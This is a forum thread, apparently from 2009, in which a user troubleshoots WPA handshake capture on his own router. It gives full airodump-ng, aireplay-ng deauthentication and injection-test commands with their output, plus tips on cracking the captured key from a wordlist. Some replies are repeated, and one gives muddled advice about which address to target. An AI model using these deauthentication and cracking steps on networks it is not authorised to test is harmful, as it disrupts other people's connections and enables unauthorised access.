WPA Handshake not working

gavshouse

ok hi ive watch the show season 5 ep 18 i think where they show how to hack WPA also ive watched many youtube videos im typing in all the right commands but its not working correctly

first of little info

Router ESSID:staniforth

Wifi Interface:wifi0

BSSID:00:17:3F:53:37:BE

Client Mac: 00:17:3F:71:EA:F5

i have 1 computer connected i obv know the password so im trying to disconnect which works then get the handshake

sudo airodump-ng -c 3 -b 00:17:3F:53:37:BE -w staniforth_a wifi0

sudo aireplay-ng -0 30 -a 00:17:3F:53:37:BE -c 00:17:3F:71:EA:F5 wifi0

it all works my other computer reconnects but nothing happens

gav@gav-laptop:~$ sudo airmon-ng start wifi0
[sudo] password for gav: 

Interface    Chipset        Driver

wifi0        Centrino a/b/g    ipwraw-ng (monitor mode enabled)
wlan1        Ralink 2573 USB    rt73usb - [phy2]

13:26:27  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:27  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:28  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]
13:26:28  Sending DeAuth to station   -- STMAC: [00:17:3F:71:EA:F5]

3 ][ Elapsed: 37 s ][ 2009-09-02 13:27 

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:17:3F:53:37:BE   -1 100      362      106    0   3  48  WPA  TKIP   PSK  staniforth                 

BSSID              STATION            PWR  Lost  Packets  Probes                                        

00:17:3F:53:37:BE  00:17:3F:71:EA:F5   -1     0      106

any thoughts ?

Are you sending it to a Belkin Router or the users mac address of their nic? Looks like it might be the router. If I remember correctly you need to send the deauth to the users mac, not the router. Try sending the deauth to "00:17:3F:53:37:BE" instead of "00:17:3F:71:EA:F5".

Are you sending it to a Belkin Router or the users mac address of their nic? Looks like it might be the router. If I remember correctly you need to send the deauth to the users mac, not the router. Try sending the deauth to "00:17:3F:53:37:BE" instead of "00:17:3F:71:EA:F5".

i think to the mac

ive tried

sudo aireplay-ng -0 50 -a 00:17:3F:71:EA:F5 -c 00:17:3F:53:37:BE wifi0

and

sudo aireplay-ng -0 50 -a 00:17:3F:53:37:BE -c 00:17:3F:71:EA:F5 wifi0

both disconnect the pc and it reconnects but it doesnt popup saying its got the handshake

I would send 4 at a time, then 4 more, then 4 more, space them out, 50 is just overkill. Run the command severl times with a second or two between tries, but so long as your card is in monitor mode and capturing on the correct channel you should have the handshake in the pcap after a few deauths and reconnects.

Maybe you are missing a step or your card isn't properly doing monitor mode, too far away, etc, could be a number of reasons.

Check this video, might help you out a bit more:

I would send 4 at a time, then 4 more, then 4 more, space them out, 50 is just overkill. Run the command severl times with a second or two between tries, but so long as your card is in monitor mode and capturing on the correct channel you should have the handshake in the pcap after a few deauths and reconnects.

Maybe you are missing a step or your card isn't properly doing monitor mode, too far away, etc, could be a number of reasons.

Check this video, might help you out a bit more:

Yeah ok im 100% sure its work i have got a handshake in my .cap and it found my keys, my commands are correct ive also ran a injection test

gav@gav-laptop:~/Desktop/hack$ sudo aireplay-ng --test wifi0
01:11:59  Trying broadcast probe requests...
01:11:59  Injection is working!
01:12:00  Found 1 AP 

01:12:00  Trying directed probe requests...
01:12:00  00:17:3F:53:37:BE - channel: 3 - 'Belkin54g'
01:12:03  Ping (min/avg/max): 2.038ms/17.191ms/33.515ms
01:12:03  21/30: 70%

gav@gav-laptop:~/Desktop/hack$

so the question is why is it getting the handshake but not reporting it back ?

I had this issue when i was testing my WPA with my password in a text file along with some common dictionary words. My password was at the very end of the file so it should of been successful in the end. I couldn't figure it out and moved on.

After I grabbed aircrack-ng from the svn, it worked like a charm. I would suggest getting the latest and greatest and trying again.

I had this issue when i was testing my WPA with my password in a text file along with some common dictionary words. My password was at the very end of the file so it should of been successful in the end. I couldn't figure it out and moved on.

After I grabbed aircrack-ng from the svn, it worked like a charm. I would suggest getting the latest and greatest and trying again.

think you mistaken what im asking, i have decrypted a key "wikipedia" which i simply wrote in so that means it had the handshake but airodump-ng didnt report back saying it had the handshake in the first place, sorry if im not clear

Maybe download the latest version anyway, like suggested, and see what happens.

think you mistaken what im asking, i have decrypted a key "wikipedia" which i simply wrote in so that means it had the handshake but airodump-ng didnt report back saying it had the handshake in the first place, sorry if im not clear

You don't catch the hand shake via typing it in on the client. You send deauths to the router masquerading as the client then catch the handshake. I'm sure it will work either way, but that's the way i've always done it.